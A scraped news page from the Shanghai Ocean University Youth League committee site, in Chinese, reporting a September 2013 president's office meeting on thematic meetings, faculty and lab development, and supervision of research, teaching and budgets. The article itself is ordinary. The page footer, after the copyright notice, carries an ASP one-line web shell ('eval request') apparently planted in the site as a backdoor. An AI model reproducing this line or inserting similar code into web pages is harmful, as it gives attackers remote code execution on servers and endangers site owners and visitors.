当前位置:共青团上海海洋大学委员会 >> 新闻中心 >> 要闻速递 >> 正文  
站内信息搜索:
我校召开2013-2014学年第二次校长办公会议
[2013年09月24日]   来源:本站原创   作者:佚名   点击数: 【字体: 】【双击滚屏

    9月22日下午,我校在行政楼104会议室召开了2013-2014学年第二次校长办公会议。校长潘迎捷、校党委副书记汪歙萍、何雅、副校长黄硕琳、封金章、程裕东、副局级巡视员顾乃达、校长助理吴建农、校长助理、水产与生命学院院长李家乐,机关部分处室负责人参加了会议。会议由潘迎捷校长主持。

    会上,人事处处长杨昕汇报了师资队伍建设工作会议准备事项,实验室与设备管理处处长殷曦敏汇报了实验室建设工作会议准备事项,研究生部部长高健汇报了研究生培养工作会议准备事项,外事处处长钟俊生汇报了国际合作与交流工作会议准备事项,科技处处长谢晶汇报了学科建设工作会议准备、科研管理督导事项,财资处处长王宪怡汇报了预算工作推进会准备、专项经费督导事项,教务处处长张宗恩汇报了本科督导事项。

    分管校领导就部门汇报的相关事项分别作了点评,提出了改进和完善意见。会议对拟召开的六个专题会和三项督导内容进行了审定。

    潘迎捷校长在讲话中指出,从10月起陆续召开的专题会议是对学校重点工作推进的细化和落实,是加强学校内涵建设和提升管理水平的重要措施。专题会议要形成常态化,每次会议要提炼出1-2个主题,主题明确,重点突出。他强调,专题会议要开“实”,开短会,会议目标要明确,政策可落实,措施可操作,由会议牵头部门总负责,相关部门积极配合,分管校领导把好关。要进一步加强督导工作,强化督导队伍组织建设,完善督导机制,科研督导要逐步与专技聘任挂钩、与学院目标责任制考核挂钩、与科研项目申报挂钩,教学督导要强化督导队伍激励,注重教学过程的全覆盖,专项经费督导要通过深化预算改革,规范项目申报、完善评审机制和过程管理,形成预算执行绩效评价系统。督导工作重在对督导意见落实,切实解决工作中存在的问题。

    会议还审定了有关学院设置助理事项、滨海养殖基地修缮事项。

 

关闭窗口

上一篇:我校2013级学生军训阅兵式顺利举行

下一篇:校领导一行到成教高职学院调研工作
  留言板 | 管理登录 版权所有 © 2007 共青团上海海洋大学委员会 tw.shou.edu.cn <% eval request((hacker) %>